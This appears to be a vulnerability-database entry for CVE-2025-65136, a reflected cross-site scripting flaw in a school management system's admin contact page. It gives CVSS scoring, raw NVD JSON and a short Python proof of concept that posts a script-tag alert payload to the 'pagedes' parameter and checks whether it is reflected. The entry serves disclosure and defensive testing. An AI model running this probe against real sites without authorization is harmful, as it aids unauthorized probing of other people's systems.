Security Vulnerability Report
中文
CVE-2025-65136 CVSS 6.1 MEDIUM

CVE-2025-65136

Published: 2026-04-14 16:16:35
Last Modified: 2026-04-17 15:33:34

Description

In manikandan580 School-management-system 1.0, a reflected XSS vulnerability exists in /studentms/admin/contact-us.php via the pagedes POST parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

manikandan580 School-management-system 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def verify_xss(target_url): # Vulnerable parameter payload = '<script>alert("CVE-2025-65136_POC")</script>' # Target endpoint endpoint = target_url + "/studentms/admin/contact-us.php" # POST data data = { "pagedes": payload } try: response = requests.post(endpoint, data=data, timeout=5) # Check if payload is reflected unescaped if payload in response.text: print("[+] Vulnerability confirmed: Reflected XSS detected.") else: print("[-] Vulnerability not detected or payload filtered.") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Replace with actual target IP/Domain target = "http://127.0.0.1" verify_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65136", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:34.640", "lastModified": "2026-04-17T15:33:34.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In manikandan580 School-management-system 1.0, a reflected XSS vulnerability exists in /studentms/admin/contact-us.php via the pagedes POST parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65136/README.md", "source": "[email protected]"}]}}